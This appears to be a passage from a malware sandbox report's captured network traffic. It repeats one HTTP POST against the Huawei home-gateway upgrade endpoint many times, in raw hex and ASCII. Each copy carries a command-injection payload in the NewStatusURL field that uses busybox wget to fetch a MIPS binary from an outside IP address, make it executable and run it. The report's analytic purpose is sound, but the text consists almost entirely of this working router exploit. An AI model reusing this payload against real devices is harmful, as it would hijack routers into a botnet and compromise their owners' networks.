xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
